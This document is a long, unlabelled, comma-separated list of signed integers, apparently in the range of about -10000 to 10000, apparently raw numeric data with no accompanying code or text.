-3829, 8572, -8510, 4438, 265, -9214, -1327, -8098, 7500, -2201, 4118, -2396, -7023, 5044, -5892, -807, -9511, 3233, -9074, 6514, 8289, -411, -3693, 6914, 4240, 4649, -448, 3274, 4103, 2908, -4612, 2465, 2044, -7528, -4791, -3772, 2260, -2943, 9442, -1189, 7497, -4277, -7789, -7205, -5587, 2132, -1411, 9621, 1881, -813, -3220, -5897, -4712, 5598, -2963, -9569, 4674, -3043, -5699, 5169, 1854, 7571, -9834, -3603, 5772, 9891, -1530, -4220, 2492, -1298, -762, 5984, -8048, -8676, -736, 4604, -774, -6884, -6138, -4071, 9224, 2174, -1646, -8895, 3040, 7107, -9272, -8794, 5863, -7420, 637, -5559, -8878, 9869, 3654, -7727, -8866, 826, -6551, 7123, 2018, 3330, -269, -6405, 7880, 4113, -5749, 319, 76, 361, -7967, 2115, 7980, -3487, -8117, -2217, 5536, -5784, -7260, 6915, 9667, 421, -2786, -1337, -4370, 6867, -7202, -4097, -6126, 1424, -4889, 6790, 7584, 1828, -2540, -5842, -6509, 4369, 6576, 9878, -825, -7109, -3068, 8002, -3584, -6883, -7502, -5084, 9123, 3615, -9117, -2373, 1626, -9876, 3394, -5778, 2572, -5064, 3044, -3033, -2917, -3400, -6946, 7238, 2391, 1041, -3691, 1434, 2704, 2010, 1148, -2151, 4080, -1372, -5773, 9629, -8593, 9522, -560, 484, -8744, -9637, -2573, 1187, 1688, 2925, 6343, -4081, 207, -7583, 3965, -3757, 1726, -1505, 3073, -6933, 1609, 3328, 7883, 8615, 6676, 7655, -1649, 989, 1027, 4870, -9215, -4166, -1533, 877, -1155, 7188, 4349, -5822, -8887, 7646, 7077, -1717, -8029, -6362, -2272, 4040, -3496, 2702, -4084, 4114, 8716, -5606, 3232, 2425, 8017, -2165, 9972, 9247, 3429, -6676, 4659, 4935, -5381, 2111, 1880, -2664, 5399, 7855, -2440, -9788, 1952, 6031, -9397, -571, -5244, -5371, 9104, -7327, -3387, 6735, -4749, -1521, -4866, 1012, 1393, -7971, -38, -1749, 9997, 4316, 6257, 938, -6541, 5337, -7470, 4381, 779, 8804, 4107, -6014, -7414, 7201, 9549, -8028, -2718, -2504, -1429, 1632, 4620, 5873, -5494, -4056, -9314, 2857, -8806, -2802, -5694, 2115, 3400, 8540, -573, -2808, -5310, 8308, 3471, -4338, -8156, 6851, -3715, 1639, 702, 5438, -2011, -3807, -2255, -7981, -5909, -4884, -819, 6550, -432, 7330, -8390, -3886, -2278, 8441, -7177, -632, 9476, 853, -223, -4101, 7330, 6201, -6565, 1769, 9831, -5397, 1814, 2845, -3375, 2154, 2903, 7356, 3578, 3831, -1601, 1152, -1242, 7743, -9012, 8954, -5728, 7439, 8970, 4757, -9624, 7800, 7066, -1960, 5580, -4954, -8029, 2133, 7316, 9784, 8672, -3729, -6519, -2113, 4792, 7898, 4076, 4819, -9216, -1210, -188, 4938, -4470, 6582, -4418, -5744, -8076, 1021, 1624, -6414, 181, -2586, -8507, -557, 9587, -8334, 2834, -6031, 1324, -2738, 8247, 1281, 7543, -7339, -5439, 9354, -6531, 6404, 251, -8335, -4801, 4283, -6977, 5748, 1994, -8608, 6435, 8916, 3962, -7479, -6703, -2658, -1816, 2412, -8898, -7616, 4830, -6102, -1078, -5208, -4041, 3007, -5057, 5819, 819, 5734, -2293, -3820, -2721, 3053, -7132, 2988, 8592, -2160, 762, -4771, -2471, 3151, 2139, -4173, 6238, 483, -8270, -4129, 9784, 7350, -3387, -5325, 4614, 2720, -8348, 2267, -5431, 1334, -7557, 5007, 5863, 8000, -1334, 6542, 2789, -5766, -1110, -2492, 3444, -4682, -3579, 8830, 5405, 6824, 4804, -8878, -3722, 1854, 8334, 3368, 6102, -4838, -2915, 4454, -3829, -5894, 7803, -5648, 1435, 9698, 4244, -6663, 215, 8048, 5462, 9607, -7334, 1795, -3932, 768, 4839, -5268, -2968, -4274, 2802, -1131, 1280, -6614, -3977, -2768, 5961, -3555, -9280, 8040, 2369, -888, 2224, 9986, -5107, 9497, 99, -4328, 5722, 2918, 8556, 5670, -138, -4014, -439, -3529, 9533, 4844, -4585, 433, -8807, -2769, -4638, -1577, -4765, 2140, -3312, 9884, -5733, -9604, 3031, 3087, -1465, 9603, -8579, 5899, 4241, -8991, -2569, 438, 6919, 3762, 8390, 7163, 4861, 8511, -7160, -6481, -1325, 7765, 4418, 3887, 9390, -7122, 7932, 8455, -2495, 1325, -9388, -9076, -7372, 9898, 773, -7655, -7286, 4598, 8056, -833, -3206, -2672, -2774, 9631, -3928, -3875, 2601, 6715, -3988, 2919, -4114, 8538, 7487, 1157, -9239, -1517, 9671, -9413, -5933, 8130, -9194, -6436, -705, 226, 8379, -2055, 1297, 7281, -7924, -8824, 2713, 3702, -4613, 9334, -4712, 2074, 8178, 3392, 5339, -9593, 6084, -8026, 4564, -7082, -9878, -4027, -1920, 1104, 4612, -9075, -6551, -8650, -3870, -3391, 8853, -5536, 1245, -4043, 5350, 3901, -6979, -2294, -7159, -3351, -8711, 6629, -5491, -8903, -6584, -3175, -4622, 8518, -7475, 1261, 5897, -6522, -1125, -8185, 7898, -3429, -7062, 2319, -750, -2632, -9178, -4771, 1910, -2619, -6228, 4184, 3933, 3851, 9213, -8212, 5618, -5580, 6050, 615, -6234, -1886, 706, 298, 4147, -953, -5781, 7288, 2395, -2679, -8937, 3398, 5754, 9743, -6537, -4973, -8175, 4021, 4177, -6336, 5383, -7075, 8860, -3919, 7699, -1899, -7050, 1735, -6138, 7857, -5644, 9939, -8427, -2555, -4390, 5109, 4432, -3244, -1921, -2284, -2479, 7531, -2770, -7958, 7441, 7502, 6363, 2601, -2472, -4440, -1452, -9697, 9751, -4923, 3553, -3995, 6678, 3944, 2917, 5510, -1978, -6420, 7218, -9145, 3827, -8343, 60, 6793, -7420, -1402, -2500, -889, -4884, 6483, -9377, -1745, -9807, -6656, -7908, 34, -1519, 2427, 2783, -4733, 8040, -4854, 8028, 1218, -8757, 9637, 8886, 7694, 3636, 2973, -4214, -7751, 3729, -9025, 5980, 3474, 4723, 1405, 3805, 5279, 3816, 1343, 117, -8447, -21, -6155, -5962, -6188, 4838, 7159, -4744, -9744, 2923, -230, 1585, -9692, -6433, -775, 4613, 1038, -1210, -1776, 4983, -4243, 4937, 5044, -1375, -2562, -7649, -2755, 6024, 4098, 4732, -9722, -4424, -7972, -4946, -2272, -719, 2204, 6212, 8199, -1601, 7599, -5750, -5980, -4287, 7666, -9826, 6918, 4332, -3609, -440, -5357, -481, -3896, 4343, -2219, -9273, 1814, -2397, -2773, 8121, 1773, -5303, 6791, 3254, -5606, 1810, -1940, 2786, -9434, 1837, 9639, -1312, 6032, 6809, -1878, 9861, 5723, 7121, 6269, -9527, 3267, -4728, 7163, 5882, -4791, 8941, 7874, -9125, -1401, -417, 8777, 1657, 8903, 5, 4363, 4942, -9971, 9806, -111, 6385, -6078, 5015, 9671, 8662, 1690, -6777, 503, -9721, 830, -7672, 9303, 83, 3015, -3055, 7919, -8145, 5970, 9503, -1807, 6756, -6187, -3530, 4778, 9642, -8537, -4088, -5923, -5136, -3785, 2012, -832, -9254, 1704, -3419, -2229, 5786, -7175, -5874, -6129, 1324, -222, -2869, -1915, 6295, 4424, 5524, 4942, -1511, -1435, -602, 7595, 5905, 4498, -6601, -1261, -9803, -981, 2090, -2261, -6212, -4962, -1769, 9252, -8521, -3863, -1956, -8541, 2846, 4973, -6644, 8182, -598, -9579, 4380, -3339, -2687, -9218, 4017, 457, 8641, 1172, -1157, 1362, 7577, 1487, 326, 4140, -5969, -7046, 6451, -6676, 1280, -3, 1768, -9373, -4361, -4795, 6056, -3664, 6504, -9632, 5433, 7050, 6800, -5473, -3621, -2669, -5474, 915, -3492, 8203, 844, 4567, -9059, -6053, -9674, -243, 639, -1489, -5063, -5454, 4975, -3936, -5630, -117, -3737, -1176, -4685, -3987, 9947, 9287, 14, 5106, -4664, 2414, -442, -5987, 3624, -8406, 208, 8594, 1193, 1317, 4037, 3355, -8596, 6230, -2231, -3024, 667, -8249, 8061, -278, -3210, -2140, -9366, 3775, -7244, 6161, 5368, -2660, 655, 3515, 8472, 3205, 7550, -7320, -3572, -3306, 8389, 7513, 5860, -2543, -2933, 8286, -6722, -5583, 5778, 6311, -3706, -8597, -3970, 626, 9611, -6574, 631, 1014, 5659, 6033, -2478, 23, 1340, 3547, 7001, 643, -6435, 2758, 6088, -8421, 6714, -1803, 9982, 3762, 6451, -1937, -7965, 1627, -6347, 8547, 5398, 6892, 6816, 4436, -3140, -2277, -4478, -1317, -8835, -307, -7339, -6453, 9715, 9391, 5897, 4252, 4856, 5548, -6603, 9605, 9913, -8543, -242, 150, 2698, -2262, 4938, -2452, 8697, 7727, 8022, -4276, -664, -6696, -7112, 6051, 3038, -3003, -8825, -9338, 6950, 3927, -6918, 5761, -8817, 5974, 7860, 1458, -479, -5618, -9465, -3168, 3163, 8415, -1682, -5284, 845, 835, -5827, -3395, 7634, 9223, 999, 5972, 8895, 648, 3977, 9779, -1832, -2665, -2566, 4607, 2454, -5879, 8547, -6776, 1669, -6164, 8055, -4994, 2322, -6050, -1670, 65, -4114, -2902, 5786, 3370, -5064, 4298, 3664, -41, -5021, 2133, -1172, -7726, 725, -6277, 7990, -3177, 4316, -9855, -846, -5256, 5459, -2773, -3171, -5767, 1507, -6079, 7573, 4745, 5526, -280, 5369, -5506, -6680, 7257, 8911, 9127, 1842, -6516, 226, -6390, -9808, -7292, -1352, 2096, -904, 8916, 6323, -4932, -7642, -1756, -5054, -3288, 3517, -8422, -7629, 6478, -8291, -3297, 294, 5761, -2906, -7109, -6775, 5544, -5208, 4020, 409, 4612, 5495, -3791, 2909, 810, -8817, -8281, 9311, -1241, 6284, -5280, -2534, 1390, 5283, 7170, -7639, -8296, -8424, -3567, 7347, 2075, -5791, -5846, 5815, -4441, -1872, 8985, 5783, 9305, 4831, 174, -8715, 168, 3925, -7852, 3695, 1647, 1204, -8558, 4889, 7211, 1478, -1344, 4086, -7430, -9324, 989, -3832, -4810, 92, 7777, 3848, -2659, -8520, -793, 5116, 8874, 8206, 3073, -36, -8789, -1313, 7759, -5603, 1547, 678, -4831, -8810, -7087, 8797, -862, -6858, 3929, -856, 5863, -2881, 7105, 7100, -652, 1072, 7087, 6048, -472, 6471, -6434, 4376, -5279, 2188, 4169, 8262, -9700, 1530, -4144, 4092, 1098, -2444, -6742, -8306, -6563, 4560, -9422, 7356, 846, -4711, 236, -856, 7217, -5948, -7190, 8262, 828, 4401, 8822, 2776, 5720, 2882, 5004, 8201, 9927, 3499, -7529, -3141, -985, -2293, 3204, 1268, -1458, -5325, 7763, 232, -8972, -5708, 1545, -3251, 7119, -8960, -5594, -3319, 8239, -3047, 238, -6500, 2281, 6828, 742, 8131, 3484, 6437, 9485, -9942, -7783, 4495, -4231, 55, -9291, -4309, 7843, -5867, -8653, -8150, 9386, 8548, -716, 5884, -6807, 6750, -1441, 6923, 8114, -9047, -258, -8696, -301, 6226, -6612, 459, -292, 4259, 11, 431, -7535, -7861, -6943, 1459, 7047, -6268, 4826, -4211, -9154, -5254, -804, -8085, -7041, 331, 5702, 6288, -5678, -7374, 4819, 3800, 1592, 9415, 3035, -3841, -1477, 4994, -2779, 7520, 4055, -6519, 2704, -2868, -6305, -3237, -6061, 9534, -1840, -7586, 9608, 6815, 4478, -3914, -5506, 4702, 1668, -9386, 779, -7707, 1594, 5768, -7956, 4310, 311, -1994, -4373, 936, -5550, 1144, 5751, 1069, -1783, 1183, 3782, 5606, 9508, -3873, 7979, -834, 3323, 8971, -3059, 7166, 4465, 4517, -838, 6139, 9381, -9488, -107, -6941, -8699, 2360, 7772, -3805, 5823, 7637, 395, 9517, 8571, -639, 2453, -8960, 3606, -1694, -3328, 3925, -9985, -8335, -1357, -5634, -663, -6077, -6454, -990, 2931, 8601, -218, -2881, -3755, -4400, -6105, -5945, 5255, 9332, -6506, 1950, -5223, 2751, 4265, -7682, -4512, -1017, 5495, -4952, 7110, -5956, -3637, -209, 8641, -5845, -7615, -9889, 3859, -381, -9712, -9688, -3565, -9825, -686, -6709, 9230, 7663, -9930, -4948, 4501, -5151, -5547, 488, -4625, 9936, -2860, 5498, -6261, -3231, 2798, -7107, 5575, -3951, 4288, 9514, 4914, -5633, 3070, 4237, 6075, -2665, 8039, -8665, -4764, -1801, 6798, -9915, 4799, -6368, -6304, -9876, -3878, 8372, 7121, 717, -3902, 5078, 2196, -993, -3773, 6398, 8144, 4247, 7422, -5833, 9009, -9668, 9066, -1181, 7056, -6282, -7992, -1385, 2162, -9952, -7423, -9546, 2451, 3795, 2285, 3409, 8454, 7607, -2413, 5677, 4551, -6343, 6115, 9000, -1086, -5231, -9012, -5562, -3487, 8366, 6869, 4647, -1857, 3864, 2336, 6867, 7066, 9808, 2184, 3542, 5578, -3092, 3545, 8343, 3670, -7189, -1699, 309, -8796, 5285, -6929, 3024, 1300, 1092, -6158, -2807, 340, 6769, 1830, 2161, 7726, -7667, -2124, -4399, -8613, 5491, 491, -3036, 2783, 953, -8317, -1880, -871, -2010, 79, -8949, 9588, 4536, 8390, 5317, -9356, 4993, 1633, 3305, -5728, 7720, -5412, -5651, -6101, 2156, 3481, 4450, 6594, -9728, -8325, 3504, -858, 1476, 3845, 3299, 8573, 7526, -7477, -232, -2100, 4349, -140, -5552, -2954, -6636, -4914, -4596, -4726, -6225, 5718, 7915, 2188, 9075, -6678, 2893, -3272, -9372, -8184, 6123, 7627, -6207, 5447, -7912, -4261, 2730, 4913, 9446, -7098, 8408, -5863, -5349, 2284, -1522, -5024, 9142, 499, -456, -933, -1528, -9803, -7624, -2546, 9244, -8132, -8419, -2017, -3190, -9323, 5236, -7775, 8966, 2953, 5421, 7185, -9684, 3167, -1807, 653, 5263, 7954, 2821, 6921, 5419, 6670, 9913, -6208, 204, 9442, -656, -5308, 8513, -2461, -2829, 7554, 1354, -6438, -3820, -1, -2640, 3493, -7718, 3932, 5508, -3017, -8748, -6112, -5211, 8627, -3249, 3302, 9165, -2706, -4966, -7479, 6783, -2608, 4451, 3159, 1092, -920, -5387, 2607, 7944, -6392, -174, 3269, 8388, -5739, -1747, 675, 5841, -2342, 3524, -2623, 2457, -8866, 7504, -2868, 5324, -9085, -6270, 4317, 1156, 8167, -73, 4796, -3394, 2129, 7666, 6626, -5175, 28, -8879, 9403, 8620, 6996, 5163, -3451, -7146, -903, 4908, 4344, 342, -8343, 5399, 5550, -3560, -4212, 151, -3606, 9328, 8802, 5657, -8026, -3585, 9623, 7169, 1928, -3909, -746, 5784, -1113, 6275, 4696, 3478, -2881, -5076, 2939, -9850, -5210, 608, -9209, -9192, 7533, -5765, -402, 2340, -4368, -3700, -2185, -9859, 979, -2506, 4223, 9155, -183, 9381, -5233, 5180, 9070, -9482, 3179, -1365, 884, -863, 375, 1091, 4780, 1014, 5663, 1754, 8525, 1796, -8154, 9453, 528, -1195, 7690, -5900, -555, 2949, 1001, 1552, -4111, 3033, 3389, -6475, 4422, 9813, 9178, 4667, 9804, -3985, -1412, -24, 3238, 9146, -2099, 1462, 1136, -7352, -7808, -9232, -943, 4731, 3562, -7907, -8498, -1467, 3602, 2401, 2416, 4347, 964, -3641, -7753, 3681, 8043, 8894, -6863, -7012, -5603, 9009, -5854, -8204, 8228, 5075, 5077, 677, 5185, -7573, 4517, -952, 8862, 5379, -6868, 9808, 1235, 6320, 6899, 9122, -4946, 8756, 3722, -9757, -6365, -2958, 4786, -8905, -7500, -5483, 3647, 7389, 5268, 7975, -247, 8838, 1500, 9413, -5397, 4406, 8618, -1329, 5542, -2466, -3879, 2092, 9811, -7804, -6850, 7790, -2062, -6053, -1135, 7894, 3670, 8872, -5969, -3204, -7945, -4783, 9851, 1843, 8794, 3535, 5663, 7298, -1560, 9727, -3959, -4045, 1401, -2754, 8398, -1044, 3326, -7854, -2829, -5558, -2050, 7722, 9214, 1359, -6328, -372, 9308, 7215, 2669, -7351, 3798, -6851, 6072, -6229, 872, 5880, -9865, -9079, 4377, -7991, 1275, -8027, 8815, -9187, 6492, 1900, 1009, 9725, 7644, 2573, 5405, -313, -8662, -1817, 609, -8661, 1278, -1922, -9443, 8554, -4204, -548, -7773, -4325, -4443, 1242, 2145, -5166, 8778, 1946, 8596, -220, -6247, -9096, 4267, 3871, 4603, -5293, 9596, 8401, 5543, 1408, 3951, -2670, -9325, -340, 5208, -6731, 9223, -1870, -6003, -8793, -6631, 8508, -1139, -7459, 6979, -5157, 3503, -9955, 6774, -3355, -3599, -3010, 6051, 6392, -3228, 3626, 7382, -3143, -7397, -6118, 3282, -7304, -8512, 6147, -599, 347, 3202, -5852, 9142, -8815, 1740, 5232, -1382, -6868, 6479, 1259, -7196, 485, 2337, 8072, 4281, -3937, 6323, -7924, 3038, 7000, 8371, -6756, -6689, 6448, -5322, 3158, -9291, 1169, 9924, 8150, 4424, 9285, -5219, -19, -282, -8531, 2707, 9348, -8237, -4790, 4434, -4716, 5328, -3799, 4465, -8380, -3611, -3770, 7889, -7786, -4365, -5544, 4127, 9903, 2114, 6215, -6150, -6913, -6340, 2892, 9948, 3286, -8516, -3021, -8849, 1293, 8526, -8839, 3772, -2117, 4759, -5317, -271, 1816, -4799, -957, 7628, -9955, 4913, 3434, 6778, -3900, -5307, -877, -7566, 924, -9166, -7177, 3878, 4473, -2467, -7849, 6199, 5902, 1831, 9793, 2856, -1808, -3099, -1615, -4158, 8747, -8629, 8921, -4517, 8707, 8408, 5234, 3948, 3903, 7364, 4732, -6630, 1484, 125, 5329, 3510, 2904, -6482, 8500, -8953, -3754, -9024, -5596, -7573, -7744, -9969, 3167, -8497, -4805, -7828, 5145, 1940, -6914, -441, 5616, -4491, -8188, -9323, -9839, -8761, -5830, 7281, -1233, 1896, -3954, 9407, -2787, -9785, 6843, -8582, -536, 7121, 2673, 4292, 6186, 3141, -2208, 3954, 79, 1406, 8847, -3350, -8958, -8893, -5613, 7189, 5936, 5542, -5604, -7970, -3415, -390, -6524, -4334, -1870, 6832, -4192, 5343, 4447, 7673, 9875, -2282, 1001, -5242, -4, -4488, -2291, -7930, -1054, 7163, 8454, -1208, -4279, 6609, -3883, 8143, -4281, 2420, -9558, -9460, 6663, 1815, 9051, -9305, 1297, 1917, -504, -5533, -9730, -9434, 7371, 1214, -6913, 7904, 1940, -3485, 3952, 3777, 1983, 6059, 4208, 3617, 4653, -2306, -8567, 4583, 4977, 2445, 8807, 5133, -9615, -9749, 798, 1856, -1980, -6647, 7664, 2265, 4550, -6561, -6583, -2816, 5964, -9430, -7259, -4231, -8519, 7387, -7366, -7485, -5434, -5175, 6474, -4638, -5632, 1021, 2204, -5034, 9098, 1431, -2845, -6660, 359, -8503, 334, 6618, -7534, -939, 1969, 6729, -5124, 6175, -3600, -8914, -8413, -7061, -9458, -1303, -8502, -613, -8335, -5334, 9133, -1043, -4607, -268, -3002, 1924, -6943, 4222, -2122, 1125, -2953, -6396, -3008, 8028, -1256, -3652, -1609, 8631, -2612, 2385, 5291, -1530, -173, 7908, -8355, -8859, 4019, -6190, 1433, -6701, -9588, -2619, 2824, 7177, 4415, -6531, -3460, 2271, -9227, 1261, -9302, 5177, 2005, -8522, 4520, 9373, 6974, 9108, 5382, -7215, 7563, -1910, 6309, -3029, 9618, -3919, -2205, -8091, 1419, -2302, -4092, 579, -5348, -405, -4372, 9013, 41, 1000, 2645, -5178, -6943, 3269, -1955, -3524, -3536, 8013, 3269, -4513, -9606, -4930, -8645, 8258, -11, 3051, 3143, -8734, -4373, 8827, -8630, 8018, -6479, -2598, -2355, -9452, -4263, 257, -9627, -919, 5537, 1716, 9855, 2567, -7735, 9540, 2202, 9724, -3153, 4819, 6690, -5276, 1944, -4415, -2440, -5044, 2460, 4559, 1520, 8844, 9962, -4210, 2844, -9740, -8701, 122, -2382, 9419, -4609, -5731, 5073, -3014, 1099, 776, -9397, 4907, 7471, 8148, 4540, -6166, -7036, -5996, 6336, 7594, 6453, 1865, 4067, -9354, 712, -8416, 6074, -2024, -936, -2549, 7926, 4509, 417, -555, -3294, 3611, 87, -3743, 5239, 7255, -5812, 6454, -7649, -8377, -133, 9274, -7438, -7259, 6502, -4532, -3586, -2774, -6451, 1793, 1740, 7568, -547, 879, -33, 2674, -9786, -8204, -8467, -2969, -3313, -5350, 5689, -9788, 9511, 7828, 5255, 17, 1309, 4061, 8051, -7075, 1250, -9229, -4101, 412, 9952, 5880, 2694, -3671, -4187, 6926, -4728, 2215, 6150, 3664, -6795, 8387, -718, 9550, 5850, 2127, -2045, 9954, 3818, -5564, 7783, -7697, 6033, 2237, 6137, 2764, -3049, 5874, -1441, 3315, 3771, -8409, 9670, 7236, -4831, 2415, -3721, 3144, 9369, 8179, -3727, 3420, 5698, -729, 2999, 8422, 6111, -7872, 3031, -3705, -6980, -6709, 8413, -2913, 2529, 8298, 8840, 9783, 587, -2511, -8871, -944, -1635, 4404, 8895, 1064, -6263, 4243, -4825, -8811, -4283, -9184, -8905, 9165, -969, -7456, -3050, 5859, 2559, -9927, -4162, 6335, -395, 8091, 7767, 8175, -7334, -669, -6592, 7087, 4907, 6708, 3675, -5721, 9023, -9419, 989, -3814, 7848, -5745, 5800, 8624, -5467, -6207, -6315, -8963, 4466, -171, 7433, 1112, 8149, -9305, 383, -598, -444, 1910, -7936, 981, -1183, -4230, -8165, 5285, 855, -9860, -6691, -4938, -8383, 8469, 9866, -2018, 5881, -1886, 1628, -8942, 1796, 1784, 7566, -664, -7988, -1122, 3273, -9698, 30, -6181, -53, 5338, -8205, -1778, -2314, -1918, 5216, 4139, -6, -3862, -7266, 6453, 5900, -9317, -9951, 7957, 6051, -4461, 4780, -1958, 5102, -7137, -1646, -3713, 5385, -181, -9202, -8875, 701, -8429, 3909, -1511, -730, -2978, -8473, -6609, 7017, 1576, 7376, 6034, -9035, -1676, 9916, -9066, 3552, 3194, -5149, 5556, 8723, -6002, -3145, -6395, -2869, -3084, 4932, -5786, 4396, 296, 9078, -8749, -8555, -8535, 5879, 8207, -3911, -7899, -8939, 9099, -8586, -3409, 426, 2359, 2411, -708, 5812, -1322, 6582, -2972, 3384, 2754, 3677, 3230, -2505, -8885, 3442, 985, -7847, 6572, -1467, -1159, 6338, 4665, 3384, 764, 6884, -3991, -973, -1767, 7794, 4346, -9426, 2377, 7398, -7567, -3223, 4946, -1897, 9526, 9584, -3090, 6576, 6490, 2393, -7127, -2749, 3435, 7985, 8288, 2663, 2432, 5092, -9128, -9097, 6512, -2619, -371, 7230, 2883, -8812, -2766, 1077, 9924, 306, -3422, -2384, -9688, -5784, -5199, -210, 8461, 4600, 8582, -3059, -2449, 399, 3632, -7794, -8893, 4640, -1663, 3329, 7675, 6929, -219, -4771, -336, -2195, -176, 2457, 43, 9265, -8531, -4480, -9764, -5827, 4286, -9626, 4304, 771, -8374, -2941, -8388, 5080, -2700, 4923, 7961, 6637, 4748, -9305, 381, 9711, 6710, -9789, -6786, 5852, 4802, -1623, -8412, -3011, -7224, 8780, 36, 2926, -7427, -6119, 4857, 1917, 1420, 5849, -5350, -7533, -9203, 8084, 8413, -662, 9794, -9673, -9374, -7162, -8259, -1665, 5862, -6450, 2195, 2951, -8189, 2356, 2510, -2053, -145, -3615, 655, 9303, 5047, 4727, 7095, -4732, 3909, 1247, 4761, -9727, 9333, -4075, 3956, -9216, 8914, -712, -4652, 5483, 4205, 8683, 8579, -8181, 8908, -5597, 2476, 9851, -8286, 4681, 8122, 523, 9587, -6945, -3196, -2482, -4412, -3395, 1954, 7730, 3240, 9205, -1425, -7951, -1529, 5070, -9058, -5262, -1071, 2628, 2119, 1187, 1785, 9053, -1236, -4350, 9514, -4140, -6287, -9819, 4239, -6232, 4381, 9870, -8655, -8883, -4320, -5493, -8401, 1917, 8564, -1499, -9067, -9032, -7790, 8675, -1875, 3098, 4154, -3831, 6858, 5228, -1953, -2657, -1852, 7460, -2909, 6159, 8547, 3811, -9568, -6494, 7218, 6830, -7000, -5304, 641, -6105, 4465, -1477, 7359, 1859, 7443, 7863, 201, -6931, -7456, 2776, -6024, 6257, -6793, 4860, 1010, 9562, -7871, -6683, 6948, -5061, -6607, 7863, 6768, -7665, -9658, -9090, -450, -8760, -3686, -5741, -8431, 7684, 9554, 8533, 3271, 3614, 2049, 4676, 6949, -1034, -1224, 6507, 6436, -1495, -7112, -9010, -5755, -9167, 2987, 4326, -3364, -5317, -4659, -3744, 5518, -1354, -8478, -4987, -9109, -8762, 2315, -3433, 5133, 4076, -7509, -266, -1824, -8496, -1007, -9268, 6833, 6946, 2489, -87, 8460, 5810, -5932, -1301, 9269, -9598, 8274, -4062, -1880, 5898, -5156, -6833, 5397, 851, -2689, -9986, 2594, 8392, 7710, 6770, -4543, 9231, -4362, 6830, 1378, 5229, 7636, 1007, 4315, 3905, -4696, -93, -2543, -5969, 5205, -4351, 2424, 5153, 4541, 2823, 7845, 6007, -3937, 1565, 4221, 9716, 5555, 3039, -1257, 1620, -6087, -6831, -9530, -2707, -8159, 3237, -1943, 6579, -5186, 9287, -7381, 6343, -7908, -1832, 9705, -4398, 6628, 3569, -7759, -414, -5118, -1390, 9825, 3384, 9854, -7900, 6180, 79, 12, 9206, 3454, -16, -897, 8636, -6862, -1512, 9916, 3028, -1892, 9123, 237, -4596, 2223, 4915, 4245, 8471, 3145, 4929, -1663, -1432, 6396, -3021, 9991, -2070, 6962, 4232, -2, 6032, -8205, 1875, -4463, -6013, -1629, -4443, -2232, -5670, 6090, 2965, -7886, 6471, -6287, 8477, 3726, -7786, -2911, 2044, -5674, -1099, 5844, -7173, -3780, 7568, 9486, -1054, -5024, 8196, -8078, -9287, 9605, 8692, 2588, 1080, -6142, -1043, -3334, -6093, 9346, 3723, 8409, -6046, 5223, 2463, 994, 9234, -5633, 2241, 9155, 1396, -2868, -831, 1741, 7584, -2709, 5365, -4176, 8363, -4919, -6503, 6197, 7942, 3834, 6613, -3791, 9293, 4224, 6063, -8395, -4436, 4133, -8830, -4601, -8647, 301, -9384, -200, -1515, 8649, -9042, 9771, 4205, -367, -1300, -9003, 8064, 8994, -5115, -3678, 9449, 7026, 5729, 2537, 1938, -8615, -2181, 7565, 9071, 289, 9910, 2964, 6222, 451, 7771, 3048, 2129, -6886, -3071, 8677, -5341, 6582, -2358, -976, 5397, -7824, 8752, 3686, 7805, 3622, 418, 9647, 856, -9219, 2356, 1769, 6299, -4967, -2461, -9284, -810, 8659, -153, -9792, 4835, -565, 4593, -7860, -5157, 8767, -8148, -9021, 4641, 2977, -4476, -1103, 8532, 1237, -9415, 100, -4491, -4350, -4976, 8197, -6850, 619, -5293, -5950, -3685, 299, -4628, -3103, 5284, 6289, 559, 6177, 7028, 3791, 7319, -1030, -5207, 4794, -701, -7067, 1619, 6920, 2998, -8049, -9210, -7791, -3143, 2509, -1828, 7594, -1410, 2623, 6528, -6950, 2738, 2196, -1022, -9486, 3887, 9375, -2839, 1381, -8621, 5846, -8720, -3662, -9117, -9643, -6332, -293, -6924, -41, 4510, -9457, 7817, -1929, -9560, -4770, 4297, 9208, -3117, 7883, 1879, 8616, 4745, 2166, -8102, 9556, -9849, 473, -2625, 3167, 9097, 2319, -614, -4915, 4364, -9126, -1396, -7785, 6975, 2755, 9795, 7318, 6635, -3036, -8696, 9048, 886, 952, -6649, 6309, 1654, -7272, -9372, 1995, -4147, -6932, -432, 9907, -8066, 5126, -9885, 9326, 3649, 4120, 5228, -3353, 1418, -547, -1036, 5093, 5523, 6963, -7455, 1059, -7098, 9670, -7128, 2348, -5564, 8458, 9658, -1420, -2290, -8012, 7478, 4640, -1075, 6789, 6604, -4592, -3028, -2585, 9500, 6012, 4460, 4608, -7859, 5520, 5915, 5938, -2544, 4038, 6538, 97, 1139, -6919, 868, -8810, -1265, -4957, -5275, -5009, -6900, 2472, 6405, -6938, 599, -40, -7591, -2604, 4011, 2606, -9153, 3765, 109, 453, -9030, -7965, 1426, 2411, -2583, -6443, 9259, 4015, 5438, -3920, -1707, -3399, 6313, 2830, 9762, -2803, 2491, -9006, -7352, -9156, -6332, 6129, -5394, 7486, 9382, 5667, -3608, -4805, 8519, -7380, -933, 753, 8690, 291, 2587, 4374, 9215, -7612, 4200, -441, -9389, -1364, 4441, 2108, -4606, 9838, -4745, 2951, -8930, -251, -4879, 9909, -7554, 3517, 7017, 5708, 3589, 5049, -1549, 7852, -7867, -7224, -6858, 4170, -7827, -2532, 4164, 6364, 4352, 8013, 8669, 6925, -6265, 4213, -1371, 4036, -9165, -8875, -3407, 1441, 7545, 7446, -5367, -7645, -5455, -6001, -314, 36, -6457, 8012, 6874, 228, 8368, 6324, -3448, 5437, 1780, -8969, -1748, 750, 6859, -5643, 1462, 4308, -2763, 3732, 3624, -6955, -4086, 6970, -103, -4687, -7967, 29, 2295, 88, -7483, 5297, -6540, -3535, 2937, -8392, 9387, -2093, 9209, -5985, -8373, 1660, -6458, -6384, -7709, 5486, -7066, 5493, -6871, -6256, 4044, 7899, -5494, -6828, -1719, 7870, -2942, 3335, -560, 1599, 8471, 8024, 9454, -8908, -3472, 5704, -993, 5362, 450, 3368, 715, 7233, -7863, -3340, 883, -4914, -6821, 9509, -4592, -6159, 6092, 3128, 9382, 3270, -3867, -2661, -2069, -1576, -4103, -6719, 9930, -4993, -8546, -338, -2599, 1342, -7734, -1790, -4712, -3933, -8226, 7534, -9892, -6259, -2034, -9166, 9964, 3886, 4679, -1688, 1331, -3121, 5671, -9478, 3651, 5816, -9261, -383, 4502, -3604, -1414, 1074, 1921, 8367, -2400, -1038, 9906, -2950, -6864, -4427, 9025, -6054, -9743, -9895, 2900, 3893, -2311, 6678, -5579, -1269, 6253, -5697, -656, 6070, 5125, -5472, -644, -2224, 9502, -9790, 5901, -2314, -8130, -9828, -3511, -4432, -7015, 